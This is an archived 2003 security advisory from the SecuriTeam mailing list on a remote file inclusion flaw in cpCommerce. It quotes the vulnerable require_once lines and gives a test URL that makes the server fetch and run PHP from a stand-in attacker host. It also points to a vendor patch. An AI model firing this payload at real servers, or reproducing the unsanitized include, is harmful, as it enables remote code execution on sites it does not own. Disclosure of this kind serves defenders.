[UNIX] File Inclusion Vulnerability in cpCommerce
From: SecuriTeam (support_at_securiteam.com)
Date: 10/19/03
- Previous message: SecuriTeam: "[NEWS] New XSS Vulnerability in Microsoft Hotmail Allows Access to Mailboxes (XMP)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Oct 2003 14:30:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
File Inclusion Vulnerability in cpCommerce
------------------------------------------------------------------------
SUMMARY
<http://www.cpcommerce.org/> cpCommerce is "an open-source e-commerce
solution that is entirely template and module based". A vulnerability in
the product allows remote attackers to cause the product to include
arbitrary PHP files and execute them.
DETAILS
There is a file inclusion vulnerability in the _functions.php file, line
13-14:
require_once("{$prefix}_config.php");
require_once("{$prefix}_gateways.php");
Is it possible for a remote attacker to include an external file and
execute arbitrary commands with the privileges of the web server (nobody
by default).
To test the vulnerability try this:
http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index
In this way, the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed
on the server.
Solution:
The author has been contacted and has published a temporary fix in the
cpCommerce website forum, waiting for the new version.
The patch is available here:
<http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864> http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.
ADDITIONAL INFORMATION
The original advisory can be downloaded from:
<http://www.zone-h.org/en/advisories/read/id=3284/>
http://www.zone-h.org/en/advisories/read/id=3284/.
The information has been provided by <mailto:astharot@zone-h.org>
Astharot.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] New XSS Vulnerability in Microsoft Hotmail Allows Access to Mailboxes (XMP)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
